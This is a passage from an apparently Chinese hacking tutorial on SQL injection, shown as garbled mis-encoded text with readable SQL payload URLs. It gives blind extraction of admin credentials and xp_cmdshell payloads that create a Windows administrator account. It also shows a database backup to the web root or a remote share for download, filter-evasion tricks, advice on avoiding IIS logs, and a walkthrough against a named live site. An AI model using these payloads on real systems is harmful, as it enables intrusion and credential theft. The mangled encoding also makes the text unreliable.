¡¶30Ìì´òÔìרҵºì¿Í¡·

ÏÂÔر¾Êé

Ìí¼ÓÊéÇ©

30Ìì´òÔìרҵºì¿Í- µÚ14²¿·Ö


°´¼üÅÌÉÏ·½Ïò¼ü ¡û »ò ¡ú ¿É¿ìËÙÉÏÏ·­Ò³£¬°´¼üÅÌÉ쵀 Enter ¼ü¿É»Øµ½±¾ÊéĿ¼ҳ£¬°´¼üÅÌÉÏ·½Ïò¼ü ¡ü ¿É»Øµ½±¾Ò³¶¥²¿£¡
áʾ³ö´í£¬¾ÍËã³ÌÐòÓÐÈÝ´í´¦Àí£¬Ò³ÃæÒ²ÓëÔ­Ò³ÃæÍêÈ«²»Í¬¡£
Èç¹ûÊý¾Ý¿âÓõÄÊÇAccess£¬ÄÇôÇé¿ö¾ÍÓÐËù²»Í¬£¬µÚÒ»¸öÍøÖ·µÄÒ³ÃæÓëÔ­Ò³ÃæÍêÈ«²»Í¬£»µÚ¶þ¸öÍøÖ·£¬ÔòÊÓºõÊý¾Ý¿âÉèÖÃÊÇ·ñÔÊÐí¶Á¸Ãϵͳ±í£¬Ò»°ãÀ´ËµÊDz»ÔÊÐíµÄ£¬ËùÒÔÓëÔ­ÍøÖ·Ò²ÊÇÍêÈ«²»Í¬¡£´ó¶àÊýÇé¿öÏ£¬ÓõÚÒ»¸öÍøÖ·¾Í¿ÉÒÔµÃ֪ϵͳËùÓõÄÊý¾Ý¿âÀàÐÍ£¬µÚ¶þ¸öÍøÖ·Ö»×÷Ϊ¿ªÆôIIS´íÎóÌáʾʱµÄÑéÖ¤¡£
ÃÇѧ»áÁˣӣѣÌ×¢ÈëµÄÅжϷ½·¨£¬µ«ÕæÕýÒªÄõ½ÍøÕ¾µÄ±£ÃÜÄÚÈÝ£¬ÊÇÔ¶Ô¶²»¹»µÄ¡£½ÓÏÂÀ´£¬ÎÒÃǾͼÌÐøѧϰÈçºÎ´ÓÊý¾Ý¿âÖлñÈ¡ÏëÒª»ñµÃµÄÄÚÈÝ£¬Ê×ÏÈ£¬ÎÒÃÇÏÈ¿´¿´£Ó£Ñ£Ì×¢ÈëµÄÒ»°ã²½Ö裺
µÚÒ»½Ú¡¢£Ó£Ñ£Ì×¢ÈëµÄÒ»°ã²½Öè
Ê×ÏÈ£¬Åжϻ·¾³£¬Ñ°ÕÒ×¢Èëµã£¬ÅжÏÊý¾Ý¿âÀàÐÍ£¬ÕâÔÚÈëÃÅƪÒѾ­½²¹ýÁË¡£
Æä´Î£¬¸ù¾Ý×¢Èë²ÎÊýÀàÐÍ£¬ÔÚÄÔº£ÖÐÖع¹SQLÓï¾äµÄԭò£¬°´²ÎÊýÀàÐÍÖ÷Òª·ÖΪÏÂÃæÈýÖÖ£º
£¨A£©¡¡¡¡ID=49¡¡ÕâÀà×¢ÈëµÄ²ÎÊýÊÇÊý×ÖÐÍ£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select¡¡*¡¡from¡¡±íÃû¡¡where¡¡×Ö¶Î=49
×¢ÈëµÄ²ÎÊýΪID=49¡¡And¡¡£§²éѯÌõ¼þ£§£¬¼´ÊÇÉú³ÉÓï¾ä£º
Select¡¡*¡¡from¡¡±íÃû¡¡where¡¡×Ö¶Î=49¡¡And¡¡£§²éѯÌõ¼þ£§
£¨B£©¡¡Class=Á¬Ðø¾ç¡¡ÕâÀà×¢ÈëµÄ²ÎÊýÊÇ×Ö·ûÐÍ£¬SQLÓï¾äԭò´óÖ¸ÅÈçÏ£º
Select¡¡*¡¡from¡¡±íÃû¡¡where¡¡×Ö¶Î=¡¯Á¬Ðø¾ç¡¯¡¡
×¢ÈëµÄ²ÎÊýΪClass=Á¬Ðø¾ç¡¯¡¡and¡¡£§²éѯÌõ¼þ£§¡¡and¡¡¡®¡¯=¡¯¡¡£¬¼´ÊÇÉú³ÉÓï¾ä£º
Select¡¡*¡¡from¡¡±íÃû¡¡where¡¡×Ö¶Î=¡¯Á¬Ðø¾ç¡¯¡¡and¡¡£§²éѯÌõ¼þ£§¡¡and¡¡¡®¡¯=¡¯¡¯
£¨C£©¡¡ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ£¬Èçkeyword=¹Ø¼ü×Ö£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select¡¡*¡¡from¡¡±íÃû¡¡where¡¡×Ö¶Îlike¡¡¡¯£¥¹Ø¼ü×Ö£¥¡¯¡¡
×¢ÈëµÄ²ÎÊýΪkeyword=¡¯¡¡and¡¡£§²éѯÌõ¼þ£§¡¡and¡¡¡®£¥25¡¯=¡¯£¬¡¡¼´ÊÇÉú³ÉÓï¾ä£º
Select¡¡*¡¡from¡¡±íÃû¡¡where×Ö¶Îlike¡¡¡¯£¥¡¯¡¡and¡¡£§²éѯÌõ¼þ£§¡¡and¡¡¡®£¥¡¯=¡¯£¥¡¯
½Ó×Å£¬½«²éѯÌõ¼þÌæ»»³ÉSQLÓï¾ä£¬²Â½â±íÃû£¬ÀýÈ磺
ID=49¡¡And¡¡£¨Select¡¡Count£¨*£©¡¡from¡¡Admin£©¡·=0
Èç¹ûÒ³Ãæ¾ÍÓëID=49µÄÏàͬ£¬ËµÃ÷¸½¼ÓÌõ¼þ³ÉÁ¢£¬¼´±íAdmin´æÔÚ£¬·´Ö®£¬¼´²»´æÔÚ£¨ÇëÀμÇÕâÖÖ·½·¨£©¡£Èç´ËÑ­»·£¬Ö±ÖÁ²Âµ½±íÃûΪֹ¡£
±íÃû²Â³öÀ´ºó£¬½«Count£¨*£©Ìæ»»³ÉCount£¨×Ö¶ÎÃû£©£¬ÓÃͬÑùµÄÔ­Àí²Â½â×Ö¶ÎÃû¡£
ÓÐÈË»á˵£ºÕâÀïÓÐһЩżȻµÄ³É·Ö£¬Èç¹û±íÃûÆðµÃºÜ¸´ÔÓû¹æÂɵģ¬ÄǸù±¾¾ÍûµÃÍæÏÂÈ¥ÁË¡£ËµµÃºÜ¶Ô£¬ÕâÊÀ½ç¸ù±¾¾Í²»´æÔÚ100£¥³É¹¦µÄºÚ¿Í¼¼Êõ£¬²ÔÓ¬²»¶£ÎÞ·ìµÄµ°£¬ÎÞÂ۶༼Êõ¶à¸ßÉîµÄºÚ¿Í£¬¶¼ÊÇÒòΪ±ðÈ˵ijÌÐòдµÃ²»ÑÏÃÜ»òʹÓÃÕß±£ÃÜÒâʶ²»¹»£¬²ÅÓеÃÏÂÊÖ¡£
ÓеãÅÜÌâÁË£¬»°Ëµ»ØÀ´£¬¶ÔÓÚSQLServerµÄ¿â£¬»¹ÊÇÓа취ÈóÌÐò¸æËßÎÒÃDZíÃû¼°×Ö¶ÎÃûµÄ£¬ÎÒÃÇÔڸ߼¶ÆªÖлá×ö½éÉÜ¡£
¡¡×îºó£¬ÔÚ±íÃûºÍÁÐÃû²Â½â³É¹¦ºó£¬ÔÙʹÓÃSQLÓï¾ä£¬µÃ³ö×ֶεÄÖµ£¬ÏÂÃæ½éÉÜÒ»ÖÖ×î³£Óõķ½·¨£­AsciiÖð×Ö½âÂë·¨£¬ËäÈ»ÕâÖÖ·½·¨ËٶȺÜÂý£¬µ«¿Ï¶¨ÊÇ¿ÉÐеķ½·¨¡£
ÎÒÃǾٸöÀý×Ó£¬ÒÑÖª±íAdminÖдæÔÚusername×ֶΣ¬Ê×ÏÈ£¬ÎÒÃÇÈ¡µÚÒ»Ìõ¼Ç¼£¬²âÊÔ³¤¶È£º
http£º//¡£19cn¡£/showdetail¡£asp£¿id=49¡¡£»£»and¡¡£¨select¡¡top¡¡1¡¡len£¨username£©¡¡from¡¡Admin£©¡·0
ÏÈ˵Ã÷Ô­Àí£ºÈç¹ûtop¡¡1µÄusername³¤¶È´óÓÚ0£¬ÔòÌõ¼þ³ÉÁ¢£»½ÓמÍÊÇ¡·1¡¢¡·2¡¢¡·3ÕâÑù²âÊÔÏÂÈ¥£¬Ò»Ö±µ½Ìõ¼þ²»³ÉÁ¢ÎªÖ¹£¬±ÈÈç¡·7³ÉÁ¢£¬¡·8²»³ÉÁ¢£¬¾ÍÊÇlen£¨username£©=8
¡¡¡¡µ±È»Ã»È˻᱿µÃ´Ó0£»1£»2£»3Ò»¸ö¸ö²âÊÔ£¬ÔõôÑù²Å±È½Ï¿ì¾Í¿´¸÷×Ô·¢»ÓÁË¡£Ôڵõ½usernameµÄ³¤¶Èºó£¬ÓÃmid£¨username£»N£»1£©½ØÈ¡µÚNλ×Ö·û£¬ÔÙasc£¨mid£¨username£»N£»1£©£©µÃµ½ASCIIÂ룬±ÈÈ磺
id=49¡¡and¡¡£¨select¡¡top¡¡1¡¡asc£¨mid£¨username£»1£»1£©£©¡¡from¡¡Admin£©¡·0
ͬÑùÒ²ÊÇÓÃÖð²½ËõС·¶Î§µÄ·½·¨µÃµ½µÚ1λ×Ö·ûµÄASCIIÂ룬עÒâµÄÊÇÓ¢ÎĺÍÊý×ÖµÄASCIIÂëÔÚ1¡­128Ö®¼ä£¬¿ÉÒÔÓÃÕÛ°ë·¨¼ÓËٲ½⣬Èç¹ûд³É³ÌÐò²âÊÔ£¬Ð§ÂÊ»áÓм«´óµÄÌá¸ß¡£
µÚ¶þ½Ú¡¢£Ó£Ñ£Ì×¢Èë³£Óú¯Êý
ÓÐSQLÓïÑÔ»ù´¡µÄÈË£¬ÔڣӣѣÌ×¢ÈëµÄʱºò³É¹¦ÂʱȲ»ÊìϤµÄÈ˸ߺܶࡣÎÒÃÇÓбØÒªÌá¸ßÒ»ÏÂ×Ô¼ºµÄSQLˮƽ£¬ÌرðÊÇһЩ³£Óõĺ¯Êý¼°ÃüÁî¡£
Access£ºasc£¨×Ö·û£©¡¡¡¡SQLServer£ºunicode£¨×Ö·û£©
×÷Ó㺷µ»Øij×Ö·ûµÄASCIIÂë
Access£ºchr£¨Êý×Ö£©¡¡¡¡SQLServer£ºnchar£¨Êý×Ö£©
×÷ÓãºÓëascÏà·´£¬¸ù¾ÝASCIIÂë·µ»Ø×Ö·û
Access£ºmid£¨×Ö·û´®£»N£»L£©¡¡¡¡SQLServer£ºsubstring£¨×Ö·û´®£»N£»L£©
×÷Ó㺷µ»Ø×Ö·û´®´ÓN¸ö×Ö·ûÆ𳤶ÈΪLµÄ×Ó×Ö·û´®£¬¼´Nµ½N£«LÖ®¼äµÄ×Ö·û´®
Access£ºabc£¨Êý×Ö£©¡¡¡¡SQLServer£ºabc¡¡£¨Êý×Ö£©
×÷Ó㺷µ»ØÊý×ֵľø¶ÔÖµ£¨Ôڲ½⺺×ÖµÄʱºò»áÓõ½£©
Access£ºA¡¡between¡¡B¡¡And¡¡C¡¡¡¡SQLServer£ºA¡¡between¡¡B¡¡And¡¡C
×÷ÓãºÅжÏAÊÇ·ñ½çÓÚBÓëCÖ®¼ä
µÚÈý½Ú¡¢ÖÐÎÄ´¦Àí·½·¨
¡¡ÔÚ×¢ÈëÖÐÅöµ½ÖÐÎÄ×Ö·ûÊdz£ÓеÄÊ£¬ÓÐЩÈËÒ»Åöµ½ÖÐÎÄ×Ö·û¾ÍÏë´òÍËÌùÄÁË¡£ÆäʵֻҪ¶ÔÖÐÎĵıàÂëÓÐËùÁ˽⣬¡°ÖÐÎÄ¿Ö¾åÖ¢¡±ºÜ¿ì¿ÉÒÔ¿Ë·þ¡£
ÏÈ˵һµã³£Ê¶£º
AccessÖУ¬ÖÐÎĵÄASCIIÂë¿ÉÄÜ»á³öÏÖ¸ºÊý£¬È¡³ö¸Ã¸ºÊýºóÓÃabs£¨£©È¡¾ø¶ÔÖµ£¬ºº×Ö×Ö·û²»±ä¡£
SQLServerÖУ¬ÖÐÎĵÄASCIIΪÕýÊý£¬µ«ÓÉÓÚÊÇUNICODEµÄ˫λ±àÂ룬²»ÄÜÓú¯Êýascii£¨£©È¡µÃASCIIÂ룬±ØÐëÓú¯Êýunicode¡¡£¨£©·µ»ØunicodeÖµ£¬ÔÙÓÃncharº¯ÊýÈ¡µÃ¶ÔÓ¦µÄÖÐÎÄ×Ö·û¡£
¡¡Á˽âÁËÉÏÃæµÄÁ½µãºó£¬ÊDz»ÊǾõµÃÖÐÎIJ½âÆäʵҲ¸úÓ¢ÎIJ¶àÄØ£¿³ýÁËʹÓõĺ¯ÊýҪעÒâ¡¢²Â½â·¶Î§´óÒ»µãÍ⣬·½·¨ÊÇûʲôÁ½ÑùµÄ¡£
ºÃÁË£¬½ñÌìдÁËÕâô¶àÓеãÀÛÁË
´ó¼Ò×Ô¼º¿´¿´°É¡¡¡¡ÎÒÏëÓ¦¸Ã¿ÉÒÔ°ÑÄãÕ⼸ÌìѧµÄ¹ØÓÚSQL×¢ÈëµÄÖÖÖÖ¶«Î÷×÷¸ö×ܽá°É¡£Í·ÄÔÖÐÓ¦¸ÃÓиöÇåÎúµÄÈÏʶÁË°É
Ã÷ÌìÎÒÃǽ«ËµÈç¹ûÅöµ½±íÃûÁÐÃû²Â²»µ½£¬»ò³ÌÐò×÷Õß¹ýÂËÁËһЩÌØÊâ×Ö·û£¬ÔõôÌá¸ß×¢ÈëµÄ³É¹¦ÂÊ£¿ÔõôÑùÌá¸ß²Â½âЧÂÊ£¿
Ã÷Ìì¼û¡¡
ÍüÁË
ÏëÔÙÇ¿µ÷Ò»µã¡¡¡ºÌØÕ÷×Ö·ûµÄÓ÷¨¡»
¡¡ÎÒÃÇÔÚ×¢ÈëµÄʱºò£»Í¨³£ÊÇÔÚÍøÖ·ºóÃæ¼Ó¡¡and¡¡1=1ºÍ¡¡and¡¡1=2È¥²âÊÔÍøÖ·ÊÇ·ñÄÜ×¢Èë
Èç¹û¿ÉÒÔ×¢È룻һ°ãÓÐÏÂÃæÁ½ÖÖÇé¿ö£º
A¡£¡¡and¡¡1=1Õý³££»¡¡and¡¡1=2±¨HTTP´íÎó£»ÕâÖÖÇé¿ö£»NBSI¿ÉÒÔ×Ô¶¯×ö³öÅжϣ»ÎÞÐèÊäÈëÌØÕ÷×Ö·û
B¡£¡¡and¡¡1=1Õý³££»¡¡and¡¡1=2Ìáʾ¡¨ÕÒ²»µ½´Ë¼Ç¼¡¨Ö®ÀàµÄÌáʾ£»µ«²»±¨HTTP´íÎó£»Õâʱ£»¾ÍÐèÒªÎÒÃÇÊäÈëÒ»¸ö¡¨ÌØÕ÷×Ö·û¡¨£»À´°ïÖú³ÌÐòʶ±ðËù´«ÈëµÄSQLÓï¾äÖ´Ðнá¹ûÊÇTrue»¹ÊÇFalse
¼òµ¥µÄ˵£»¡¨ÌØÕ÷×Ö·û¡¨¾ÍÊÇ¡¡and¡¡1=1Ò³ÃæÖаüº¬Óжø¡¡and¡¡1=2Ò³ÃæÖв»°üº¬ÓеÄ×Ö·û´®¡£¡¡
¡ºµÚ22Ìì¡»SQL×¢Èë¹¥»÷¼ÌÐøÉ
ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â¡®
SQLServerÊÇÒ»¸ö¹¦ÄÜÇ¿´óµÄÊý¾Ý¿âϵͳ£¬Óë²Ù×÷ϵͳҲÓнôÃܵÄÁªÏµ£¬Õâ¸ø¿ª·¢Õß´øÀ´Á˺ܴóµÄ·½±ã£¬µ«ÁíÒ»·½Ã棬ҲΪעÈëÕßÌṩÁËÒ»¸öÌø°å£¬ÎÒÃÇÏÈÀ´¿´¿´¼¸¸ö¾ßÌåµÄÀý×Ó£º
¢Ù¡¡http£º//Site/url¡£asp£¿id=1£»exec¡¡master¡£¡£xp_cmdshell¡¡¡°¡¡user¡¡name¡¡password¡¡/add¡±¡­¡­
¡¡¡¡·ÖºÅ£»ÔÚSQLServerÖбíʾ¸ô¿ªÇ°ºóÁ½¾äÓï¾ä£¬¡­¡­±íʾºóÃæµÄÓï¾äΪעÊÍ£¬ËùÒÔ£¬Õâ¾äÓï¾äÔÚSQLServerÖн«±»·Ö³ÉÁ½¾äÖ´ÐУ¬ÏÈÊÇSelect³öID=1µÄ¼Ç¼£¬È»ºóÖ´Ðд洢¹ý³Ìxp_cmdshell£¬Õâ¸ö´æ´¢¹ý³ÌÓÃÓÚµ÷ÓÃϵͳÃüÁÓÚÊÇ£¬ÓÃÃüÁîн¨ÁËÓû§ÃûΪname¡¢ÃÜÂëΪpasswordµÄwindowsµÄÕʺţ¬½Ó×Å£º
¢Ú¡¡http£º//Site/url¡£asp£¿id=1£»exec¡¡master¡£¡£xp_cmdshell¡¡¡°¡¡localgroup¡¡name¡¡administrators¡¡/add¡±¡­¡­
¡¡¡¡½«Ð½¨µÄÕʺÅname¼ÓÈë¹ÜÀíÔ±×飬²»ÓÃÁ½·ÖÖÓ£¬ÄãÒѾ­Äõ½ÁËϵͳ×î¸ßȨÏÞ£¡µ±È»£¬ÕâÖÖ·½·¨Ö»ÊÊÓÃÓÚÓÃsaÁ¬½ÓÊý¾Ý¿âµÄÇé¿ö£¬·ñÔò£¬ÊÇûÓÐȨÏÞµ÷ÓÃxp_cmdshellµÄ¡£
¡¡¡¡¢Û¡¡http£º//Site/url¡£asp£¿id=1¡¡£»£»and¡¡db_name£¨£©¡·0
Ç°ÃæÓиöÀàËƵÄÀý×Óand¡¡user¡·0£¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name£¨£©ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
¢Ü¡¡http£º//Site/url¡£asp£¿id=1£»backup¡¡database¡¡Êý¾Ý¿âÃû¡¡to¡¡disk=¡¯c£ºipubroot1¡£db¡¯£»¡­¡­
ÕâÊÇÏ൱ºÝµÄÒ»ÕУ¬´Ó¢ÛÄõ½µÄÊý¾Ý¿âÃû£¬¼ÓÉÏijЩIIS³ö´í±©Â¶³öµÄ¾ø¶Ô·¾¶£¬½«Êý¾Ý¿â±¸·Ýµ½WebĿ¼ÏÂÃ棬ÔÙÓÃHTTP°ÑÕû¸öÊý¾Ý¿â¾ÍÍêÍêÕûÕûµÄÏÂÔØ»ØÀ´£¬ËùÓеĹÜÀíÔ±¼°Óû§ÃÜÂ붼һÀÀÎÞÒÅ£¡ÔÚ²»ÖªµÀ¾ø¶Ô·¾¶µÄʱºò£¬»¹¿ÉÒÔ±¸·Ýµ½ÍøÂçµØÖ·µÄ·½·¨£¨Èç202¡£96¡£xx¡£xxShare1¡£db£©£¬µ«³É¹¦Âʲ»¸ß¡£
¡¡¡¡¢Ý¡¡http£º//Site/url¡£asp£¿id=1¡¡£»£»and¡¡£¨Select¡¡Top¡¡1¡¡name¡¡from¡¡sysobjects¡¡where¡¡xtype=¡¯U¡¯¡¡and¡¡status¡·0£©¡·0
Ç°Ãæ˵¹ý£¬sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=¡¯U¡¯¡¡and¡¡status¡·0£¬±íʾÓû§½¨Á¢µÄ±íÃû£¬ÉÏÃæµÄÓï¾ä½«µÚÒ»¸ö±íÃûÈ¡³ö£¬Óë0±È½Ï´óС£¬Èñ¨´íÐÅÏ¢°Ñ±íÃû±©Â¶³öÀ´¡£µÚ¶þ¡¢µÚÈý¸ö±íÃûÔõô»ñÈ¡£¿»¹ÊÇÁô¸øÎÒÃÇ´ÏÃ÷µÄ¶ÁÕß˼¿¼°É¡£
¢Þ¡¡http£º//Site/url¡£asp£¿id=1¡¡£»£»and¡¡£¨Select¡¡Top¡¡1¡¡col_name£¨object_id£¨¡®±íÃû¡¯£©£»1£©¡¡from¡¡sysobjects£©¡·0
´Ó¢ÝÄõ½±íÃûºó£¬ÓÃobject_id£¨¡®±íÃû¡¯£©»ñÈ¡±íÃû¶ÔÓ¦µÄÄÚ²¿ID£¬col_name£¨±íÃûID£»1£©´ú±í¸Ã±íµÄµÚ1¸ö×Ö¶ÎÃû£¬½«1»»³É2£»3£»4¡£¡£¡£¾Í¿ÉÒÔÖð¸ö»ñÈ¡Ëù²Â½â±íÀïÃæµÄ×Ö¶ÎÃû¡£
ÒÔÉÏ6µãÊÇÎÒÑо¿SQLServer×¢ÈëÒÔÀ´µÄÐÄѪ½á¾§£¬¿ÉÒÔ¿´³ö£¬¶ÔSQLServerµÄÁ˽â³Ì¶È£¬Ö±½ÓÓ°Ïì×ųɹ¦Âʼ°²Â½âËٶȡ£¡¡
¶þ
ÓкܶàÈËϲ»¶Ó᯺ŲâÊÔ×¢È멶´£¬ËùÒÔÒ²ÓкܶàÈËÓùýÂË¡¯ºÅµÄ·½·¨À´¡°·ÀÖ¹¡±×¢È멶´£¬ÕâÒ²ÐíÄܵ²×¡Ò»Ð©ÈëÃÅÕߵĹ¥»÷£¬µ«¶Ô£Ó£Ñ£Ì×¢Èë±È½ÏÊìϤµÄÈË£¬»¹ÊÇ¿ÉÒÔÀûÓÃÏà¹ØµÄº¯Êý£¬´ïµ½Èƹý³ÌÐòÏÞÖƵÄÄ¿µÄ¡£
ÔÚÇ°ÃæµÄSQLÒ»°ã×¢ÈëÖУ¬ÎÒËùÓõÄÓï¾ä£¬¶¼ÊǾ­¹ýÎÒÓÅ»¯£¬ÈÃÆä²»°üº¬Óе¥ÒýºÅµÄ£»ÔÚ¡°ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â¡±ÖУ¬ÓÐЩÓï¾ä°üº¬ÓС¯ºÅ£¬ÎÒÃǾٸöÀý×ÓÀ´¿´¿´Ôõô¸ÄÔìÕâЩÓï¾ä£º
¼òµ¥µÄÈçwhere¡¡xtype=¡¯U¡¯£¬×Ö·ûU¶ÔÓ¦µÄASCIIÂëÊÇ85£¬ËùÒÔ¿ÉÒÔÓÃwhere¡¡xtype=char£¨85£©´úÌ棻Èç¹û×Ö·ûÊÇÖÐÎĵģ¬±ÈÈçwhere¡¡name=¡¯Óû§¡¯£¬¿ÉÒÔÓÃwhere¡¡name=nchar£¨29992£©£«nchar£¨25143£©´úÌæ¡£
Èý¡¡¾­µäÖеľ­µä
¾­ÑéС½á
1¡£ÓÐЩÈË»á¹ýÂËSelect¡¢Update¡¢DeleteÕâЩ¹Ø¼ü×Ö£¬µ«Æ«Æ«Íü¼ÇÇø·Ö´óСд£¬ËùÒÔ´ó¼Ò¿ÉÒÔÓÃselecTÕâÑù³¢ÊÔһϡ£
2¡£Ôڲ²»µ½×Ö¶ÎÃûʱ£¬²»·Á¿´¿´ÍøÕ¾ÉϵĵǼ±íµ¥£¬Ò»°ãΪÁË·½±ãÆð¼û£¬×Ö¶ÎÃû¶¼Óë±íµ¥µÄÊäÈë¿òÈ¡ÏàͬµÄÃû×Ö¡£
3¡£Ìرð×¢Ò⣺µØÖ·À¸µÄ£«ºÅ´«Èë³ÌÐòºó½âÊÍΪ¿Õ¸ñ£¬£¥2B½âÊÍΪ£«ºÅ£¬£¥25½âÊÍΪ£¥ºÅ£¬¾ßÌå¿ÉÒԲο¼URLEncodeµÄÏà¹Ø½éÉÜ¡£
4¡£ÓÃGet·½·¨×¢Èëʱ£¬IIS»á¼Ç¼ÄãËùÓеÄÌá½»×Ö·û´®£¬¶ÔPost·½·¨×öÔò²»¼Ç¼£¬ËùÒÔÄÜÓÃPostµÄÍøÖ·¾¡Á¿²»ÓÃGet¡£
5¡£¡¡²Â½âAccessʱֻÄÜÓÃAsciiÖð×Ö½âÂë·¨£¬SQLServerÒ²¿ÉÒÔÓÃÕâÖÖ·½·¨£¬Ö»ÐèÒªÁ½ÕßÖ®¼äµÄÇø±ð¼´¿É£¬µ«ÊÇÈç¹ûÄÜÓÃSQLServerµÄ±¨´íÐÅÏ¢°ÑÖµ±©Â¶³öÀ´£¬ÄÇЧÂʺÍ׼ȷÂÊ»áÓм«´óµÄÌá¸ß¡£
¡ºµÚ23Ìì¡»SQL×¢ÈëºÚ¿Í·ÀÏßÍøվʵÀý·ÖÎö
ÒÔÏÂΪȫÎÄתÔØ
½ñÌìµ½ºÚ·ÀÕ¾ÉÏÈ¥¿´¿´ÎÄÕ£¬¿ÉÄܳöÓÚ¡°Ö°Òµ¡±Ï°¹ß£¬¿´µ½£¿classid=1Ö®ÀàµÄ¶«¶«¾Í²»ÓÉ×ÔÖ÷µÄÏë¼Óµãʲô²ÎÊý½øÈ¥¡£
¡¡µ±ÔÚÒ³Ãæhttp£º//¡£hacker¡£¡£cn/article/index¡£asp£¿classid=3&Nclassid=13¼ÓÉÏ¢Ùand¡¡1=1ºÍ¢Úand¡¡1=2£¬¶¼Ìáʾ¡°´¦Àí¡¡URL¡¡Ê±·þÎñÆ÷Éϳö´í¡£ÇëºÍϵͳ¹ÜÀíÔ±ÁªÂ硱£¬¿´ÆðÀ´ÏóÒѾ­¹ýÂËÁË·Ç·¨Ìá½»£¬IISÒ²¹Ø±ÕÁË´íÎóÌáʾ£¬ÔÙ¼ÓÉÏÒ»¸ö¢Ûµ¥ÒýºÅ¡¯µÄʱºò£¬Ò²³öͬÑùµÄ´íÎóÌáʾ£¬È»¶øÃ÷ÏÔÓëÇ°Á½¸ö´íÎóÌáʾ²»Í¬£¬ÒòΪǰÕßÏÔʾÁ˺ڿͷÀÏßµÄLogo²ÅÌáʾ´íÎ󣬺óÕßÔòÊÇÒ»¸ö¿Õ°×µÄ´íÎóÌáʾҳ¡£
¡¡Õâ¿ÉÊÇÎÒ´ÓÀ´Ã»Åöµ½¹ýµÄÌØÊâÇé¿ö£¬µ½µ×Äܲ»ÄÜ×¢ÈëÄØ£¿
¡¡»»¸ö½Ç¶È£¬´Ó³ÌÐòÔ±µÄ˼·ÊÇÔõôдÕâ¶Î³ÌÐòµÄ¡£Ê×ÏÈ£¬Èç¹ûÊÇÓÃcintÖ®ÀຯÊý£¬ÄÇÈýÖÖ²âÊÔ·½·¨´íÎóÌáʾӦ¸ÃÊÇÍêÈ«Ò»ÑùµÄ£»Èç¹ûû¹ýÂ˵Ļ°£¬¢Ù¢ÚµÄ½á¹ûÓ¦¸ÃÊDz»Ò»ÑùµÄ¡£ÅųýÁ˼¸ÖÖÇé¿ö£¬×îºó¾õµÃ¼«¿ÉÄÜÊDz¿·ÖÓï¾ä¹ýÂË£¬³öÏÖÕâÖÖÇé¿öºÜ¿ÉÄÜÊÇcintÓï¾ä²»Ð¡Ðķŵ½SQLÓï¾äµÄºóÃ棬ÔÚSQLÓï¾äͨ¹ýºó£¬ºóÃæµÄÓï¾ä±¨´í¡£
¡¡ËäÈ»»¹²»ºÜÈ·¶¨Êµ¼ÊµÄ³ÌÐòÊÇÔõôдµÄ£¬µ«¿ÉÒÔÈ·¶¨£¬ÕâȷʵÊÇÒ»¸ö×¢Èëµã£¡
¡¡¸ù¾ÝÎÒдµÄ¡¶SQL×¢È멶´È«½Ó´¥¡·£¬ÏÂÒ»²½¾ÍÊÇÅжÏÊý¾Ý¿âÀàÐÍ£¬ÒòΪ´íÎóÌáʾ¶¼±»ÆÁ±Î£¬Ö»ÄÜͨ¹ýϵͳ±í²âÊÔÁË£¬ÊäÈ룺
¡¡http£º//¡£hacker¡£¡£cn/article/index¡£asp£¿classid=1¡¡and¡¡£¨Select¡¡count£¨1£©¡¡from¡¡sysobjects£©¡·=0
¡¡Ìáʾ³ö´í£¬Ã»³öÏÖLogo£¬ËµÃ÷ÊÇÓï¾ä±¾ÉíÓÐ´í£¬¼«¿ÉÄÜÊDZísysobjects²»´æÔÚ£¬Ò²¾ÍÊÇ˵Êý¾Ý¿âÊÇAccess£¬ÔÙÄÃÒ»¸öAccessÓ¦ÓеÄϵͳ±íÊÔÊÔ£¨msysobjectsÔÚÕâ¸öʱºòÅɲ»ÉÏÓ󡣬ÒòΪÔÚWebÏÂûÓÐȨÏÞ¶ÁÈ¡£¬SQLÓï¾äͬÑù²»ÄÜͨ¹ý£¬ËùÒÔ£¬±ØÐë»»¸öÓÐȨÏ޵ıíÈçMSysAccessObjects£©£¬¹ûÈ»£¬³öÏÖÁ˺ڷÀµÄLogo£¬Ö¤ÊµÊý¾Ý¿âȷʵÊÇAccess¡£
¡¡½ÓÏÂÀ´µÄ²Â½â¾Í±È½Ï¼òµ¥ÁË£¬Óã¨count£¨1£©¡¡from¡¡admin£©¡·=0²âÊÔ³öadmin±í´æÔÚ£¬±íÖÐÓÐusername¡¢password×ֶΡ£±¾À´ÒÔΪÏÂÃæ¾ÍÊÇÓÃ×îÆÕͨµÄAscii½âÂë·¨²Â½â¼Ç¼£¬Ð¡Case£¬Ã»Ïëµ½£¬Ò»¿ªÊ¼²Â½â£¬²Å·¢ÏÖÕâÊÇ×îÄѿеÄÒ»¿é¹ÇÍ·£º´«Í³µÄAscii¶Ô±ÈÖУ¬ÎÞÂÛÌõ¼þÊÇ·ñ³ÉÁ¢£¬Óï¾ä¶¼ÊÇ¿ÉÒÔÕýÈ·Ö´Ðеģ¬ËüÊÇÀûÓÃASPµÄ³ö´í¶ø·ÇSQLÓï¾äµÄ³ö´íÀ´·¢ÏÖ´íÎóµÄ£¬ÔÚÕâ¸öÒ³Ã棬²»¹ÜÄã³É²»³ÉÁ¢£¬¶¼ÊÇÏÔʾһ¸öLogoÈ»ºó±¨´í£¬¸ù¾ÝÎÞ·¨×ö³öÅжϡ£
¡¡Ú¤Ë¼¿àÏëÁË°ë¸öÖÓÍ·£¬ÖÕÓÚÏë³öÒ»ÖÖ·½·¨£¬ÈÃSQLÓï¾äÓÐÌõ¼þµÄ±¨´í£¬ÏÈ¿´¿´Óï¾ä£º
http£º//¡£hacker¡£¡£cn/article/index¡£asp£¿classid=1¡¡and¡¡
£¨select¡¡top¡¡1¡¡iif£¨asc£¨mid£¨username£»1£»1£©£©¡·96£»1£»username£©¡¡from¡¡admin£©¡·0
